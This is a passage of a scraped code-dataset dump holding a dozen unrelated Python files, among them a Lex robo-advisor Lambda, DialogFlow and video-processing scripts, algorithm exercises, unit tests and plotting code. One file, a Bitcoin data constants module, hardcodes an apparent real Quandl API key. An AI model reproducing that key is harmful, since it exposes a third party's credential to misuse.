you for your information.\n Based on the risk level you defined, my recommendation is to choose an investment portfolio with {}\n \"\"\".format(first_name, initial_recommendation),\n },\n )\n\n### Intents Dispatcher ###\n\ndef dispatch(intent_request):\n \"\"\"Called when the user specifies an intent for this bot.\"\"\"\n intent_name = intent_request[\"currentIntent\"][\"name\"]\n if 
intent_name == \"RecommendPortfolio\":\n return recommend_portfolio(intent_request)\n raise Exception(\"Intent with name \" + intent_name + \" not supported\")\n\n\n### Main Handler ###\n\ndef lambda_handler(event, context):\n \"\"\"\n Route the incoming request based on intent.\n The JSON body of the request is provided in the event slot.\n \"\"\"\n return dispatch(event)","repo_name":"bgregory0913/AWS_Lex_Lambda__RoboAdvisor","sub_path":"RoboAdvisor/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"74737705053","text":"from google_cloud import create_intent\nfrom environs import Env\nimport argparse\nimport json\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(\n description='Скрипт для обучения DialogFlow'\n )\n parser.add_argument(\n '-path',\n help='путь к json файлу с тренировочными фразами',\n type=str,\n nargs='?',\n default='.'\n )\n return parser.parse_args()\n\n\ndef main():\n env = Env()\n env.read_env()\n project_id = env.str('PROJECT_ID')\n args = parse_arguments()\n filepath = args.path\n\n with open(filepath, 'r', encoding='UTF-8') as file:\n file_contents = file.read()\n\n data_intents = json.loads(file_contents)\n for indent_name, training_data in data_intents.items():\n display_name = indent_name\n training_phrases_parts = training_data['questions']\n message_texts = [training_data['answer']]\n create_intent(project_id, display_name, training_phrases_parts, message_texts)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"free-flow-code/dialog_bot","sub_path":"DialogFlow_learning_script.py","file_name":"DialogFlow_learning_script.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22479959480","text":"import PackthingParser as pp\nimport PackthingConfiguration as 
cfg\n\nimport PackthingImporter as importer\nimport keyengine as kk\n\nimport platforms\nimport packagers \n\nfrom utils import log\n\ndef add_config(names, group=None):\n for n in names:\n cfg.setting(n, pp.find(n, group).value)\n\n\n# collect main info\n\nd = pp.load('packthing.yml')\npp.parse(d, \"main\")\n\nadd_config([\"name\", \"package\", \"org\", \"url\",\n \"maintainer\", \"email\", \"copyright\",\"license\",\n \"tagline\", \"description\"], \"main\")\n\n# collect platforms\n\nplatform = importer.module(cfg.value(\"platform\"), platforms)\n\nadd_config(kk.keys(cfg.value(\"platform\")), cfg.value(\"platform\"))\nplatform.setup()\npp.parse(platform.tree(), \"_platform_\")\n\n# collect controllers\n\ndef version():\n cfg.setting(\"version\", \"0.0.0\")\n try:\n cfg.setting(\"version\", pp.find(\"version\", \"main\").value)\n except AttributeError:\n pass\n cfg.override(\"version\", \"anothervalue\")\n\nversion()\n\n# collect builders\n\nprint(pp.findallvalues(\"builder\", \"repo\"))\n\n# collect packagers\n\ndef installer_name(package, version, arch, ext=None):\n s = package + \"-\" + version + \"-\" + arch\n if ext:\n s += \".\" + ext\n return s\n\npackager = importer.module(cfg.value(\"packager\"), packagers)\n#packager.setup()\n\npp.parse(packager.tree(), \"_packager_\")\npp.parse(packager.tree(), \"_packager_\")\n\ncfg.setting(\"installer\", \n installer_name(cfg.value(\"package\"),\n cfg.value(\"version\"),\n cfg.value(\"arch\"),\n pp.find(\"ext\", \"_packager_\").value))\n\n\ncfg.printConfiguration()\n","repo_name":"bweir/packthing2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"74894115293","text":"from os import path\nimport calendar\nimport time\n\nQUANDL_API_KEY = '6Vypbvq4CTqLv-USiz-y'\nSTART_TIMESTAMP = 1279324800\nSTART_DATE = '2010-07-18'\nEND_TIMESTAMP = 1519603200\nREGRESSION_X_STEP = 30 # 
days\nREGRESSION_TIMESPAN = 361670400 \nCURRENT_TIME = int(calendar.timegm(time.gmtime()))\n\nDATA_PATH = path.abspath(path.join(path.dirname(__file__), '..', 'data'))\nDATA_MIN_PATH = path.abspath(path.join(path.dirname(__file__), '..', 'data-min'))\n\nSTATIC_PATH = path.join(DATA_PATH, 'static')\nREGRESSIONS_PATH = path.join(DATA_PATH, 'regressions')\nREGRESSIONS_MIN_PATH = path.abspath(path.join(DATA_MIN_PATH, 'regressions'))\nNORMALIZED_PATH = path.join(DATA_PATH, 'normalized')\nNORMALIZED_MIN_PATH = path.join(DATA_MIN_PATH, 'normalized')\n\n# static data\nHALVINGS = path.join(STATIC_PATH, 'halvings.json')\nBLKHDRS_RAW = path.join(STATIC_PATH, 'blkhdrs')\nBLKHDRS = path.join(STATIC_PATH, 'blockchain_headers.csv')\n\n# raw data\nADDRESSES = path.join(DATA_PATH, 'addresses.json')\nMARKETCAP = path.join(DATA_PATH, 'marketcap.json')\nPRICE = path.join(DATA_PATH, 'price.json')\nREALIZEDCAP = path.join(DATA_PATH, 'realizedcap.json')\nSUPPLY = path.join(DATA_PATH, 'supply.json')\nTRANSACTIONS = path.join(DATA_PATH, 'transactions.json')\nMONTHLY_SUPPLY = path.join(DATA_PATH, 'monthly_supply.json')\nINTEREST = path.join(DATA_PATH, 'interest.json')\nFEAR_GREED = path.join(DATA_PATH, 'fear_greed.json')\nVOLUME = path.join(DATA_PATH, 'volume.json')\nCOT = path.join(DATA_PATH, 'cot.json')\nDEALER_RATIO = path.join(DATA_PATH, 'dealer_ratio.json')\nASSETMNGR_RATIO = path.join(DATA_PATH, 'assetmngr_ratio.json')\nFUNDS_RATIO = path.join(DATA_PATH, 'funds_ratio.json')\n\n# regression data\nTRANSACTIONS_POWER_SQUARED = path.join(REGRESSIONS_PATH, 'transactions_power_squared.json')\nADDRESSES_POWER_GENMETCALFE = path.join(REGRESSIONS_PATH, 'addresses_power_genmetcalfe.json')\nTROLOLOLO_LOG = path.join(REGRESSIONS_PATH, 'trolololo_log.json')\nPOWER_LAW = path.join(REGRESSIONS_PATH, 'power_law.json')\n\n# normalized data\nTRANSACTIONS_SQUARED = path.join(NORMALIZED_PATH, 'transactions_squared.json')\nMETCALFE_PRICE = path.join(NORMALIZED_PATH, 
'metcalfe_price.json')\nADDRESSES_GENMETCALFE = path.join(NORMALIZED_PATH, 'addresses_genmetcalfe.json')\nSTOCK_TO_FLOW = path.join(NORMALIZED_PATH, 'stock_flow.json')\nINTEREST_SCALED = path.join(NORMALIZED_PATH, 'interest_scaled.json')\nDAILY_LOG_RETURNS = path.join(NORMALIZED_PATH, 'daily_log_returns.json')\nMETCALFE_MULTIPLE = path.join(NORMALIZED_PATH, 'metcalfe_multiple.json')\n\n# API URLs\nBLOCKCHAIN_URL = 'https://api.blockchain.info/charts/'\nCOINMETRICS_URL = 'https://community-api.coinmetrics.io/v2/assets/btc/'\n\nDATA_INFO = [\n {\n 'path': ADDRESSES,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=AdrActCnt&start=%s' % START_DATE\n },\n {\n 'path': MARKETCAP,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=CapMrktCurUSD&start=%s' % START_DATE\n },\n {\n 'path': PRICE,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=PriceUSD&start=%s' % START_DATE\n },\n {\n 'path': REALIZEDCAP,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=CapRealUSD&start=%s' % START_DATE\n },\n {\n 'path': SUPPLY,\n 'url': COINMETRICS_URL,\n 'endpoint': 'metricdata?metrics=SplyCur&start=%s' % START_DATE\n },\n { \n 'path': TRANSACTIONS,\n 'url': BLOCKCHAIN_URL,\n 'endpoint': 'n-transactions-excluding-popular?timespan=all&start=%s&format=json&sampled=false' % START_TIMESTAMP\n },\n {\n 'path': VOLUME,\n 'url': BLOCKCHAIN_URL,\n 'endpoint': 'trade-volume?timespan=all&start=%s&format=json&sampled=false' % START_TIMESTAMP\n },\n {\n 'path': FEAR_GREED,\n 'url': 'https://api.alternative.me/',\n 'endpoint': 'fng/?limit=0'\n },\n {\n 'path': COT,\n 'url': 'https://www.quandl.com/api/v3/datasets/',\n 'endpoint': 'CFTC/133741_F_ALL.json?api_key=%s' % QUANDL_API_KEY\n }\n]\n","repo_name":"christosci/BitcoinTrajectory","sub_path":"cron/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 
+{"seq_id":"28997294170","text":"N, M = map(int, input().split()) # 한 줄에 입력받기\ninclude = []\n\ndef perm(k):\n if len(include) == M:\n for i in range(M):\n print(include[i], end=' ')\n print(\"\") #\\n 쓰지 않아도 됨\n return\n for i in range(k, N+1):\n if i not in include:\n include.append(i)\n perm(i+1) # k+1 아님~! k랑 i 구분하기!!\n include.pop()\n \nperm(1)","repo_name":"yunjikwak/algorithm","sub_path":"BOJ/prob15650.py","file_name":"prob15650.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18343132127","text":"import unittest\nfrom openlostcat.operators.filter_operators import FilterConst, FilterREF\nfrom openlostcat.operators.bool_operators import BoolConst, BoolREF\nfrom openlostcat.parsers.refdict import RefDict\n\n\nclass TestRefDict(unittest.TestCase):\n\n def test_is_ref(self):\n \"\"\"Test is_ref function\n \"\"\"\n self.assertTrue(RefDict.is_ref(\"#filter_ref\"))\n self.assertTrue(RefDict.is_ref(\"##bool_ref\"))\n self.assertFalse(RefDict.is_ref(\"not_a_valid_ref\"))\n\n def test_is_bool_ref(self):\n \"\"\"Test is_bool_ref function\n \"\"\"\n self.assertFalse(RefDict.is_bool_ref(\"#filter_ref\"))\n self.assertTrue(RefDict.is_bool_ref(\"##bool_ref\"))\n self.assertFalse(RefDict.is_bool_ref(\"not_a_valid_ref\"))\n\n def test_create_ref(self):\n \"\"\"Test create_ref function\n \"\"\"\n with self.assertRaises(SyntaxError):\n RefDict.create_ref(\"not_a_valid_ref\", FilterConst(False))\n with self.assertRaises(SyntaxError):\n RefDict.create_ref(\"#filter_ref\", BoolConst(False))\n self.assertTrue(isinstance(RefDict.create_ref(\"#filter_ref\", FilterConst(True)), FilterREF))\n self.assertTrue(isinstance(RefDict.create_ref(\"##bool_ref\", BoolConst(True)), BoolREF))\n self.assertTrue(isinstance(RefDict.create_ref(\"##bool_ref\", FilterConst(True)), BoolREF))\n\n def test_getter_setter_filter(self):\n \"\"\"Test get and set function\n \"\"\"\n filter_ref = 
RefDict.create_ref(\"#filter_ref\", FilterConst(True))\n ref_dict = RefDict()\n ref_dict.set_ref(filter_ref)\n self.assertEqual(len(ref_dict.filter_ref_dict), 1)\n self.assertEqual(ref_dict.get_ref(\"#filter_ref\"), filter_ref)\n\n def test_getter_setter_bool(self):\n \"\"\"Test get and set function\n \"\"\"\n bool_ref = RefDict.create_ref(\"##bool_ref\", BoolConst(True))\n ref_dict = RefDict()\n ref_dict.set_ref(bool_ref)\n self.assertEqual(len(ref_dict.bool_ref_dict), 1)\n self.assertEqual(ref_dict.get_ref(\"##bool_ref\"), bool_ref)\n\n def test_setter_duplicate_ref_name(self):\n \"\"\"Test if error was raised by set duplicate ref\n \"\"\"\n bool_ref = RefDict.create_ref(\"##bool_ref\", BoolConst(True))\n bool_ref2 = RefDict.create_ref(\"##bool_ref\", BoolConst(False))\n ref_dict = RefDict()\n ref_dict.set_ref(bool_ref)\n with self.assertRaises(SyntaxError):\n ref_dict.set_ref(bool_ref2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lukacsg/openlostcat","sub_path":"tests/parsers/test_refdict.py","file_name":"test_refdict.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71710604575","text":"import math, ResMgr\nfrom items import _xml\nfrom items.components import sound_components\nfrom items.writers import shared_writers\n\ndef writeWWTripleSoundConfig(soundConfig, section):\n _xml.rewriteString(section, 'wwsound', soundConfig.wwsound, defaultValue='')\n _xml.rewriteString(section, 'wwsoundPC', soundConfig.wwsoundPC, defaultValue='')\n _xml.rewriteString(section, 'wwsoundNPC', soundConfig.wwsoundNPC, defaultValue='')\n\n\ndef writeHullAimingSound(hullAimingSound, section, cache):\n if hullAimingSound is None:\n return _xml.deleteAndCleanup(section, 'hullAiming/audio')\n else:\n changed = False\n audioKey = 'hullAiming/audio/'\n changed |= shared_writers.writeLodDist(hullAimingSound.lodDist, section, audioKey + 'lodDist', cache)\n changed 
|= _xml.rewriteFloat(section, audioKey + 'angleLimitValue', math.degrees(hullAimingSound.angleLimitValue))\n soundsKey = audioKey + 'sounds/'\n soundsDS = _xml.ListRewriter(section, soundsKey + '*')\n for sound in hullAimingSound.sounds:\n soundDS = soundsDS.next(preferredPredicate=lambda ds, snd=sound: ds.name == snd.state, path=soundsKey + sound.state)\n changed |= _xml.rewriteString(soundDS, 'underLimitSounds/wwsoundPC', sound.underLimitSounds.PC)\n changed |= _xml.rewriteString(soundDS, 'underLimitSounds/wwsoundNPC', sound.underLimitSounds.NPC)\n changed |= _xml.rewriteString(soundDS, 'overLimitSounds/wwsoundPC', sound.overLimitSounds.PC)\n changed |= _xml.rewriteString(soundDS, 'overLimitSounds/wwsoundNPC', sound.overLimitSounds.NPC)\n\n changed |= soundsDS.flush()\n return changed","repo_name":"IzeBerg/wot-src","sub_path":"sources/res/scripts/common/items/writers/sound_writers.py","file_name":"sound_writers.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"33"} +{"seq_id":"11830327576","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# define colorscale\ncmap = {\"orange\" : \"#E69F00\", \"light_blue\" : \"#56B4E9\",\n \"green\" : \"#009E73\", \"yellow\" : \"#F0E442\",\n \"blue\" : \"#0072B2\", \"red\" : \"#D55E00\",\n \"pink\" : \"#CC79A7\", \"black\" : \"#000000\"}\n\n##############\n## settings ##\n##############\n\nparameter_name = 'nu'\nparameter_name_fancy = 'Memory\\nhalf- life'\nparameter_unit = 'd.'\nIC_ratio = 0.162\npopulation = [11.6e6, 10.4e6]\nIC_beds_nominal = [1000, 600]\nIC_beds_extended = [2000, 1000]\nlocation_IC_annotation = 175\nIC_multipliers = [IC_beds_nominal[1]/IC_beds_nominal[i] for i in range(len(IC_beds_nominal))]\nstates = ['Ih', 'x', 'l']\ncountries = ['BE', 'SWE']\ncountry_names = ['Belgium', 'Sweden']\ncolors = [cmap['blue'], cmap['green'], cmap['red'], cmap['black']]\nylabels = ['IC load (beds)', 'Gross\\nagg. 
output (%)', 'Labor\\ncompensation (%)']\nylimits = [[[0, 7.75],[0,8.5]], [90, 101], [90, 101]]\n\n###############\n## internals ##\n###############\n\n# define all paths absolute\nabs_dir = os.path.dirname(__file__)\n\n# load simulations\nsimout = pd.read_csv(os.path.join(abs_dir, f'simulations-variate_parameters-{parameter_name}.csv'), header=0, index_col=[0, 1, 2], parse_dates=True)\ndates = simout.index.get_level_values('date').unique().values\nparameter_values = simout.index.get_level_values(parameter_name).unique().values\n\n########################\n## visualise only epi ##\n########################\n\nfig, ax = plt.subplots(nrows=1, ncols=len(countries), figsize=(8.3, 11.7/3.3), sharex=True)\n\nylimit=[[0, 6.3],[0,7]]\n\nfor j, (country,IC_multiplier) in enumerate(zip(countries, IC_multipliers)):\n for val,color in zip(parameter_values,colors):\n ## Simulations\n ax[j].plot(range(len(dates)), simout.loc[(country, val, slice(None)), 'Ih']*IC_ratio*IC_multiplier,\n color=color, linewidth=2)\n\n ## HCS capacity\n # lines\n ax[j].axhline(IC_beds_nominal[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n linestyle='--', color='black', linewidth=1)\n #ax[j].axhline(IC_beds_extended[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n # linestyle='--', color='black', linewidth=1)\n # text\n ax[j].text(x=location_IC_annotation, y=(IC_beds_nominal[j])/population[j] *\n 100000*IC_multiplier+0.20, s=f'nominal IC capacity', size=10)\n #ax[j].text(x=location_IC_annotation, y=(IC_beds_extended[j])/population[j] *\n # 100000*IC_multiplier+0.20, s=f'extended IC capacity', size=10) \n ## hide spines\n ax[j].spines[['right', 'top']].set_visible(False)\n ## y-axis\n # ylimits\n ax[j].set_ylim(ylimit[j])\n # ylabels\n if j==0:\n ax[j].set_ylabel(ylabels[0], size=14)\n # no yticks for IC load\n ax[j].set_yticks([])\n # align y labels\n posx=-0.025\n ax[j].yaxis.set_label_coords(posx, 0.5)\n ## x-axis\n # xticksize\n ax[j].tick_params(axis='both', which='major', 
labelsize=14)\n # xlabels\n ax[j].set_xlabel('time (days)', size=14)\n # legend\n #if j == len(countries)-1:\n # ax[j].legend(parameter_values, title=f'{parameter_name_fancy} ({parameter_unit})', framealpha=1, loc=4)\n # title\n ax[j].set_title(country_names[j], size=14)\n\nplt.tight_layout()\nplt.savefig(f'simulations-variate_parameters-{parameter_name}-epi_only.pdf')\n#plt.show()\nplt.close()\n\n#########################\n## visualise scenarios ##\n#########################\n\n# make figure\nfig, ax = plt.subplots(nrows=len(states), ncols=len(countries), figsize=(11.7, 8.3), sharex=True)\n\nfor i,(state,ylimit,ylabel) in enumerate(zip(states,ylimits,ylabels)):\n for j, (country,IC_multiplier) in enumerate(zip(countries, IC_multipliers)):\n for val,color in zip(parameter_values,colors):\n # visualise scenarios\n if state == 'Ih':\n ax[i,j].plot(range(len(dates)), simout.loc[(country, val, slice(None)), state]*IC_ratio*IC_multiplier, linewidth=2, color=color)\n else:\n ax[i,j].plot(range(len(dates)), simout.loc[(country, val, slice(None)), state], color=color, linewidth=2)\n \n ## HCS capacity\n if i==0:\n # lines\n ax[0, j].axhline(IC_beds_nominal[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n linestyle='--', color='black', linewidth=1)\n #ax[0, j].axhline(IC_beds_extended[j]/population[j]*100000*IC_multiplier, xmin=0, xmax=1,\n # linestyle='--', color='black', linewidth=1)\n # text\n ax[0, j].text(x=location_IC_annotation, y=(IC_beds_nominal[j])/population[j] *\n 100000*IC_multiplier+0.20, s=f'nominal IC capacity', size=10)\n #ax[0, j].text(x=location_IC_annotation, y=(IC_beds_extended[j])/population[j] *\n # 100000*IC_multiplier+0.20, s=f'extended IC capacity', size=10) \n ## hide spines\n ax[i,j].spines[['right', 'top']].set_visible(False)\n ## y-axis\n # ylimits\n if i == 0:\n ax[i,j].set_ylim(ylimit[j])\n else:\n ax[i,j].set_ylim(ylimit)\n # ylabels\n if j==0:\n ax[i,j].set_ylabel(ylabel, size=14)\n # no yticks for IC load\n if i==0:\n 
ax[i,j].set_yticks([])\n # align y labels\n posx=-0.075\n ax[0, j].yaxis.set_label_coords(posx, 0.5)\n ## x-axis\n # xlabels\n if i == len(states)-1:\n ax[i, j].set_xlabel('time (days)', size=14)\n # legend\n if ((i == len(states)-1) & (j == len(countries)-1)):\n ax[i, j].legend(parameter_values, title=f'{parameter_name_fancy} ({parameter_unit})', framealpha=1)\n # title\n if i==0:\n ax[i, j].set_title(country_names[j])\n\nplt.tight_layout()\nplt.savefig(f'simulations-variate_parameters-{parameter_name}.pdf')\nplt.show()\nplt.close()\n","repo_name":"twallema/pyIEEM","sub_path":"notebooks/visualise-variation_parameter.py","file_name":"visualise-variation_parameter.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30035502610","text":"# Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).\n\n# For example,\n# S = \"ADOBECODEBANC\"\n# T = \"ABC\"\n# Minimum window is \"BANC\".\n\n# Note:\n# If there is no such window in S that covers all characters in T, return the empty string \"\".\n\n# If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S.\n\n# idea: use 2 dict to count\n# brute force:\nclass Solution(object):\n def minWindow(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n\n def isSubset(cntT, cntS):\n for char in cntT:\n if char not in cntS or cntS[char] < cntT[char]:\n return False\n return True\n\n cntT = {}\n for char in t:\n if char not in cntT:\n cntT[char] = 0\n cntT[char] += 1\n\n l, res, minLen = 0, '', len(s) + 1\n cntS = {}\n for idx, char in enumerate(s):\n if char in cntT:\n if char not in cntS:\n cntS[char] = 0\n cntS[char] += 1\n if isSubset(cntT, cntS):\n while isSubset(cntT, cntS):\n if idx - l + 1 < minLen:\n minLen = idx - l + 1\n res = s[l: idx + 1]\n if s[l] in cntS:\n cntS[s[l]] 
-= 1\n if cntS[s[l]] == 0:\n del cntS[s[l]]\n l += 1\n return res\n\n# better implementation\nclass Solution(object):\n def minWindow(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n cnt_t = collections.defaultdict(lambda: 0)\n for char in t:\n cnt_t[char] += 1\n res_len = float('inf')\n res = ''\n left = 0\n cnt = len(t)\n\n for index, char in enumerate(s):\n if char in cnt_t:\n if cnt_t[char] > 0:\n cnt -= 1\n cnt_t[char] -= 1\n while cnt == 0:\n # compute the answer and make it invalid\n if index - left + 1 < res_len:\n res_len = index - left + 1\n res = s[left: index + 1]\n if s[left] in cnt_t:\n if cnt_t[s[left]] == 0:\n cnt += 1\n cnt_t[s[left]] += 1\n left += 1\n return res\n","repo_name":"Jason101616/LeetCode_Solution","sub_path":"Hash Table/76. Minimum Window Substring.py","file_name":"76. Minimum Window Substring.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"23983414359","text":"from chinaArea.MyClass import Area\nfrom utils.ExcelUtils import ExcelUtils\n\narea = Area()\nallArea = []\n\narea.parentCode = \"CHN\"\narea.parentName = \"中国\"\narea.type = \"省\"\nallArea.append(area)\nExcelUtils().writeExcel(\"d:\\\\xx.xls\", allArea)\n","repo_name":"cuiynan/python","sub_path":"chinaArea/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8864339209","text":"#!/usr/bin/env python3\n#\n# This file is part of the AVHD-AS / P.NATS Phase 2 Processing Chain\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport os\nimport logging\nimport lib.test_config as cfg\nimport lib.parse_args as parse_args\nimport lib.log as log\nimport lib.cmd_utils as cmd_utils\nimport lib.ffmpeg as ffmpeg\nimport lib.check_requirements as check_requirements\n\nlogger = log.setup_custom_logger('main')\n\n\ndef run(cli_args):\n test_config = cfg.TestConfig(cli_args.test_config, cli_args.filter_src, cli_args.filter_hrc, cli_args.filter_pvs)\n\n # get all required segments to be encoded\n required_segments = test_config.get_required_segments()\n\n # encode in parallel\n logger.info(\"will generate \" + str(len(required_segments)) + \" segments\")\n\n import lib.downloader as downloader\n dload = downloader.Downloader(\n folder=test_config.get_video_segments_path(),\n bitmovin_key_file=os.path.join(check_requirements.get_processing_chain_dir(), \"bitmovin_settings\", \"keyfile.txt\"),\n input_details=os.path.join(check_requirements.get_processing_chain_dir(), \"bitmovin_settings\", \"input_details.yaml\"),\n output_details=os.path.join(check_requirements.get_processing_chain_dir(), \"bitmovin_settings\", \"output_details.yaml\"),\n overwrite=cli_args.force)\n\n cmd_runner = cmd_utils.ParallelRunner(cli_args.parallelism)\n\n for seg in required_segments:\n if seg.video_coding.is_online:\n if not cli_args.skip_online_services:\n if seg.video_coding.encoder == \"youtube\":\n logger.debug(\"will download youtube-encoding for video \" + seg.get_filename() + \".\")\n if not cli_args.dry_run:\n dload.init_download(seg, cli_args.force, cli_args.verbose)\n elif seg.video_coding.encoder.casefold() == \"bitmovin\":\n logger.debug(\"will encode \" + seg.get_filename() + \" using Bitmovin.\")\n if not cli_args.dry_run:\n 
dload.encode_bitmovin(seg=seg)\n else:\n logger.debug(\"skipping \" + seg.get_filename() + \"because skipping online services is enabled.\")\n else:\n cmd = ffmpeg.encode_segment(seg, overwrite=cli_args.force)\n cmd_runner.add_cmd(\n cmd,\n name=str(seg)\n )\n\n # only write logfile if command should run\n if cmd:\n logfile = seg.get_logfile_path()\n\n # replace all absolute paths\n seg_cmd = cmd.replace(test_config.get_video_segments_path() + \"/\", \"\")\n seg_cmd = seg_cmd.replace(check_requirements.get_processing_chain_dir() + \"/logs/\", \"\")\n seg_cmd = seg_cmd.replace(test_config.get_src_vid_path() + \"/\", \"\")\n\n logger.debug(\"writing segment logfile to \" + logfile)\n if not cli_args.dry_run:\n with open(logfile, \"w\") as lf:\n lf.write(\"segmentFilename: \" + seg.get_filename() + \"\\n\")\n lf.write(\"processingChain: \" + check_requirements.get_processing_chain_version() + \"\\n\")\n lf.write(\"ffmpegCommand: \" + seg_cmd + \"\\n\")\n\n if cli_args.dry_run:\n cmd_runner.log_commands()\n return test_config\n\n logger.info(\"starting to process segments, please wait\")\n cmd_runner.run_commands()\n\n return test_config\n\n\ndef main():\n cli_args = parse_args.parse_args(os.path.basename(__file__), 1)\n\n # initialize logger\n if cli_args.verbose:\n logger.setLevel(logging.DEBUG)\n\n check_requirements.check_requirements(skip=cli_args.skip_requirements)\n\n run(cli_args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pnats2avhd/processing-chain","sub_path":"p01_generateSegments.py","file_name":"p01_generateSegments.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"36043042127","text":"import os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), 
os.pardir)))\n\nsetup(\n name='django-pastebinapp',\n version='0.0.2',\n packages=['pastebinapp'],\n include_package_data=True,\n license='MIT License',\n description='A simple Django app for posting code snippets',\n long_description='README',\n url='',\n author='Anthony Schubert',\n author_email='schubeal@gmail.com',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Framework :: Django :: 1.9', # replace \"X.Y\" as appropriate\n 'Intended Audience :: Developers, Sys Admins',\n 'License :: OSI Approved :: MIT License', # example license\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n # Replace these appropriately if you are stuck on Python 2.\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n)\n","repo_name":"suttung3r/django-pastebinapp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1200209098","text":"import sys\ninput = sys.stdin.readline\n\n############ ---- Input Functions ---- ############\ndef inp():\n return(int(input()))\ndef inlt():\n return(list(map(int,input().split())))\ndef insr():\n s = input()\n return(list(s[:len(s) - 1]))\ndef invr():\n return(map(int,input().split()))\nt = inp()\nwhile t:\n t-=1\n n = inp()\n flag = 1\n numOfOp = 0\n if n % 2 == 0:\n numOfOp = int(n/2)\n flag = 0\n elif n == 1:\n numOfOp = 1\n else:\n numOfOp = int((n+1)/2)\n print(numOfOp)\n istart = 2\n jstart = 6\n if flag:\n print(\"1 2\")\n istart = 5\n jstart = 9\n numOfOp -= 1\n for i in range(0, numOfOp):\n ik = istart + 6*i\n jk = jstart + 6*i\n print(f'{ik} 
{jk}')\n","repo_name":"SazidAF/CodeCartridge","sub_path":"Problems/python/banban.py","file_name":"banban.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73229527494","text":"from time import sleep\nfrom datetime import datetime\nfrom sh import gphoto2 as gp\nimport signal, os, subprocess\n\nsave_loc = \"/home/pi/Desktop/gphoto/Images/\" + datetime.now().strftime(\"%Y-%m-%d\")\n\ndef killgphoto2Process():\n p = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE)\n out, err = p.communicate()\n \n for line in out.splitlines():\n if b'gvfsd-gphoto2' in line:\n pid = int(line.split(None, 1)[0])\n os.kill(pid, signal.SIGKILL)\n \ndef createSaveFolder():\n try:\n os.makedirs(save_loc)\n except:\n print(\"Folder already exists\")\n os.chdir(save_loc)\n \ndef captureImage():\n gp([\"--capture-image-and-download\"])\n \n \ndef renameFiles():\n for filename in os.listdir(\".\"):\n if len(filename) <20:\n if filename.endswith(\".jpg\"):\n os.rename(filename, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\".jpg\")\n \n ","repo_name":"JFriedrich29/Physical_Computing_Python","sub_path":"CameraHandler.py","file_name":"CameraHandler.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15542038336","text":"#|==============================================================|#\n# Made by IntSPstudio\n# 